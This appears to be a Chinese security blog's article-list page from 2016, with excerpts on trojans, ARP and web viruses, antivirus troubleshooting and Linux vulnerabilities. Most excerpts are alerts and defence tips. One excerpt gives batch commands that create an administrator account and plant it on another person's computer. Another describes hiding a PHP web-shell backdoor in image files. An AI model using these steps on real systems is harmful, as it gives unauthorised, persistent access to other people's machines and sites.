注意 “QQ大盗”木马注入 QQ 进程记录QQ账号与密码

2016年10月21日 10 阅读

“QQ大盗”变种AC（Win32.PSWTroj.QQPass.ac）是一个盗取QQ账号和密码的木马病毒。 “网游追击者”变种CD（Win32.Troj.LipGame.cd）是一个盗取多个网络游戏账号的木马病毒。 一、“QQ大盗”变种AC（Win32.PSWTroj.QQPass.ac） 威胁级别：★ 该病毒是一个盗号木马，它会潜伏在受感染的电脑系统里，监视并伺机注入到QQ进程里，创建信息勾子，记录用户的QQ账号和密码信息，并将其发送给木马种植者，造成用...

卡巴斯基6.0自动断开连接又重新启动的解决方法

2016年10月21日 12 阅读

很多使用卡巴斯基6.0都会遇到这种情况：卡巴斯基总是自动断开连接，要重新启动程序。 解决办法一：到设置---服务，关闭自我保护。 解决办法二：导致卡巴斯基6.0莫名退出的原因原来是c:windowssystem32drwtsn32.exe（华生医生）程序，它企图对卡巴有两个攻击动作被截它靠敏锐捕捉到了。 1、drwstsn32.exe 它企图写入卡巴的memory。 2、drwstsn32.exe 它企图jnjects own code int...

安全知识:怎样隐藏 PHP文件后门的技巧

2016年10月21日 13 阅读

最近很多朋友都在问我是否能把我那一句话木马隐藏到HTML或图片里，其实把一句话木马插入到PHP文件中就已经很隐蔽了，如果说硬是要放到HTML文件或图片里，就接着往下看的这篇测试报告吧。 要知道如果光把PHP语句放到图片里是无论如何也不能执行的，因为PHP只解析扩展名为php的文件。所以说要能使隐藏在图片里的PHP语句执行。我们就的借助PHP中的调用函数 ：include 、require 等。 我们还记得前些日子把木马隐藏到图片的文章吧。也就是在P...

小心ARP病毒给你带来的危害

2016年10月21日 10 阅读

江民反病毒中心接到用户孙先生的求助电话，“我们现在局域网中所有用户无论访问哪个网站，杀毒软件都报毒，公司自己网站也被报告感染了病毒。我们检查后发现在网页上多出了一段代码，但是手工删除代码后一会又出现了，其他网站网页上也有同样的代码，这到底是什么病毒啊？” 江民反病毒专家对该局域网分析后，发现孙先生的网站感染了有局域网“杀手”之称的ARP病毒新变种。该病毒会导致局域网内任意电脑访问网页时，打开的网页都被杀毒软件报告带毒，同时该带毒网页会通过微软的MS06-...

网页病毒我不怕 上网安全轻松防范

2016年10月21日 10 阅读

上网的时候不注意打开一个网址，在不知觉的情况下，病毒可能已经悄悄进驻了电脑，这些病毒会使IE不停的弹出窗口，IE主页被修改等等，严重的对系统性能也会造成非常大的影响。IE病毒清除起来还是比较容易。 什么是网页病毒 网页病毒是利用网页来进行破坏的病毒，它使用一些SCRIPT语言编写的一些恶意代码利用IE的漏洞来实现病毒植入。当用户登录某些含有网页病毒的网站时，网页病毒便被悄悄激活，这些病毒一旦激活，可以利用系统的一些资源进行破坏。轻则修改用户的注册表...

在系统中创建别人删不掉的管理员用户

2016年10月21日 12 阅读

操作步骤： 1、在自己电脑里面建立一个.txt文本文件. 2、在里面输入内容 @echo off net user xixi 123456 /add 注释：前面xixi是用户名后面123456是密码； net localgroup administrators xixi /add 3、把这个文件保存，更改后缀为xixi.bat 注释：前面名字随便，后面格式一定要是bat； 4、把这个文件拷贝到对方电脑C:WINNTsystem32Gr...

轻松玩转AV终结者病毒

2016年10月21日 11 阅读

最近“帕虫”（瑞星），AV终结者（金山命名）蛮流行的，其实就是7、8位字符病毒。我们民间的菜鸟管它叫“随机字母、数字病毒”。貌似反病毒论坛每天都有人因为这个病毒求助，我也跟该病毒打过几次照面了，觉得没什么特别的，现在将它们病毒的技术做简单介绍，并附上几个破解方法。 Autorun.inf 一个暗藏杀机的文本格式，以至于有些杀软都加入病毒库，传播U盘病毒的罪魁祸首，很多情况下我们把它视为敌人，如果配合系统默认的"自动播放"功能,那激活病毒的机率将会是...

互联网进入木马时代 反病毒软件将死去？

2016年10月21日 10 阅读

据国外媒体报道，在6月13日的赛门铁克VISION 2007用户大会上，来自Yankee Group研究机构的安全专家Andrew Jaquith表示杀毒软件将无法有效率地处理日益增多的恶意程序，并预言杀毒软件未来将死去。 Jaquith认为，来自互联网的主要威胁正在由电脑病毒转向恶意程序及木马，“在这样的情况下，过去采用的特征库判别法显然已经过时，在不久的将来，杀毒软件将会死去，变得无用。” 而来自国内安全机构的调查也证实，曾经大行其道的蠕虫等病毒正...

路由器不能上网破解方法

2016年10月21日 11 阅读

提供几种方法，大家可以试试.ADSL共享上网有两种方式，一种是代理，一种是地址翻译（NAT），大家常说的路由方式其实就是NAT方式，其实路由和NAT的原理还是有区别的，这里不作讨论，现在的ADSL猫一般都有NAT的功能，用它本身的功能实现共享上网是比经济方便，本文主要讨论这种方式。要想阻断一台以上的计算机上网必须能发现共享后边的机器是否多于一台，经过NAT转换后访问外网的内网的计算机的地址都变成了192.168.0.1而且MAC地址也转换成了ADSL的MA...

LINUX系列最新漏洞

2016年10月21日 10 阅读

Linux Kernel SCTP连接远程内核崩溃拒绝服务漏洞受影响系统：Linux kernel < 2.6.21.4不受影响系统：Linux kernel 2.6.21.4描述：Linux Kernel是开放源码操作系统Linux所使用的内核。Linux Kernel在实现SCTP连接时存在漏洞，远程攻击者可能利用此漏洞导致内核崩溃。如果用户发送了未知的块类型创建新的连接，就可能导致在访问sctp_timeouts[SCTP_CONNTRACK_...

“ＱＱ通行证变种病毒控制ＱＱ乱发消息 盗取用户账号信息

2016年10月21日 10 阅读

本周有一个病毒特别值得注意，它是“ＱＱ通行证变种ＴＮＣ（Ｔｒｏｊａｎ．ＰＳＷ．ＱＱＰａｓｓ．ｔｎｃ）”病毒。这一病毒会通过ＱＱ向好友乱发带有病毒链接的信息，其他用户打开链接中的文件就有可能被病毒感染。因此，瑞星反病毒反木马一周播将其列为本周关注病毒，警惕程度为★★★☆。 ＱＱ通行证变种ＴＮＣ是一个能在ＷＩＮ９Ｘ／ＮＴ／２０００／ＸＰ系统上运行的蠕虫病毒。这一病毒运行后会自动向用户好友的ＱＱ发送内容为“这里有我的照片帮我顶下 记得回复我哦 点击就可下载”的...

[注意]6月26日计算机病毒及木马发布

2016年10月21日 10 阅读

据瑞星全球反病毒监测网介绍，今日有两个病毒特别值得注意，它们是：“灰鸽子变种ZFP（Backdoor.Win32.Gpigeon.zfp）”和“波特后门变种N（Backdoor.Win32.Sdbot.n）”病毒。“灰鸽子变种ZFP”是后门程序，利用它提供的功能，黑客可对中毒电脑进行远程控制，如记录键盘、从网上下载文件、对外进行攻击等等。“波特后门变种N”会修改本机配置文件，造成一些国外反病毒软件的官方网站无法访问。同时会在中毒电脑上开设后门，借此黑客可...

AV终结者病毒危害显现 大量盗号木马风雨欲来

2016年10月21日 11 阅读

近日，关于“AV终结者”病毒的讨伐声不断，大量用户深受该病毒的侵害。昨日，金山毒霸反病毒专家再次指出：“AV终结者”的危害才刚刚开始。反病毒专家戴光剑表示，这个被称为史上最牛的木马下载器的“AV终结者”病毒，其最大的危害并非病毒本身，而是引发了新一轮木马病毒的泛滥。 据悉，“AV终结者”病毒已经在互联网上肆虐数日，然而由于该病毒的隐蔽性极高，大量用户甚至感染了该病毒也毫无察觉。而用户电脑的安全系统就是在不知不觉中被彻底破坏，电脑完全处于“裸奔”状态，而...

小心！最新钓鱼网站利用百度MP3跳转挂木马病毒漏洞

2016年10月21日 11 阅读

这几天发现一种新型的利用“百度MP3跳转漏洞”的钓鱼类恶意网站，它利用了QQ为传播途径，在链接语句构造上更具迷惑性，如下图所示：=780） window.open（"http://bbs.s-sos.net/attachments/20070626_ac6cef336ee0291a23acq5kWtqlv1OsX.jpg"）;" src="http://bbs.s-sos.net/attachments/20070626_ac6cef336ee0291a2...

灰鸽子新版病毒进程内容替换并加监视

2016年10月21日 10 阅读

继灰鸽子木马宣称退出江湖之后的一段时间内，金山反病毒中心截获的灰鸽子相关病毒，主要是以加壳做免杀为主。上周末，金山反病毒中心截获一重大变化的灰鸽子新变种，证实灰鸽子并未退出江湖，在经过短暂的静默之后，正在图谋收复失地。 新版灰鸽子的主要更新有： 采用进程内容替换技术和双进程互相监视技术，大大提高自我保护的能力； 进程内容替换是指：病毒启动一个Iexplore.exe 进程，然后把该进程的内容替换为病毒进程的内容。从而具备更深的隐藏性。 进程互相监...

如何删除浏览器地址栏列表中文地址

2016年10月21日 10 阅读

随着访问网址的增加，在IE浏览器的地址栏列表栏中会增加很多访问过的网址，大家通常隔一段时间就会使用常规的方法清除一下历史记录。 常规清除历史记录的方法是：在IE浏览器中，打开“工具菜单”，选择“Interent选项”命令，在“Interent选项”对话框的“常规”选项卡中，单击“清除历史记录”按钮，就可以将“http://”开头的由英文字母组成的网址都删除了。 但是随着网上推行使用中文实名以来（在地址栏中直接输入中文进行访问），这种常规的删除网址的...

安全无小事 小心病毒对系统硬件的破坏

2016年10月21日 10 阅读

CIH病毒曾经把大家搞得人心惶惶，掀起了不小的波澜。以前的各种病毒最多只能破坏硬盘数据，而CIH却能侵入主板上的Flash BIOS，破坏其内容而使主板报废。CIH的教训告诉我们：不要轻视病毒对硬件的破坏。很多人开始担忧：会不会有更多的破坏硬件的病毒出现？其实，仔细分析一下。病毒破坏硬件的“手段”，不外乎有以下几种： 1.破坏显示器 众所周知，每台显示器都有自已的带宽和最高分辨率、场频。早期生产的14英寸彩色显示器,带宽大约只有35-45MHz,对...

教你一招 让浏览器远离流氓软件

2016年10月21日 11 阅读

微软的 IE7 已经出了一段时间，通过这段时间的使用，发现 IE7 在各个方面都有不少的进步。 自从出现了流氓软件后，IE的工具栏就是各个流氓软件抢夺的重要地盘，IE6 经常体无完肤。现在，IE7 的出现终于可以还给浏览器一个干净的天空。 IE7不加载任何插件启动 当你不希望使用任何插件时，你可以右键点击桌面上的IE图标，选择“Start Without Add-ons（不加载插件启动）”，使用这种方式启动的浏览器就不会加载任何插件了。 ...

首个同时感染Windows与Linux系统下文件的病毒出现

2016年10月21日 11 阅读

见识下这个东东。据瑞星全球反病毒监测网介绍有一个病毒特别值得注意，它是：“Bi病毒（Parasite.Bi）”。该病毒是全球首个能够同时感染Windows系统和Linux系统下文件的跨平台病毒。 热门病毒： “Bi病毒（Parasite.Bi）”病毒：警惕程度★★★☆，文件型病毒，通过感染文件传播，依赖系统：WIN 9X/NT/2000/XP/Linux。 该病毒采用汇编语言编写，通过感染可执行文件传播。病毒运行后将搜寻当前目录下所有的可执行文件，并...

给自己心爱的MSN配备防毒杀毒功能

2016年10月21日 12 阅读

如何在MSN中嵌入kv2007 前段时间，利用MSN自动传播的病毒再次爆发，例如“MSN性感相册”.如果可以在MSN中提前嵌入杀毒软件，就可以有效避免这种病毒。 我的机器里装的是KV2007，这里就以KV2007为例。其他杀软同理。 我们打开MSN的设置选项,以MSN8.0的具体打开方法:点击下三角--工具--选项-- 文件传输--使用下列程序进行病毒扫描--打入" "C:Program FilesJiangMinAntiVirusKVScan.kx...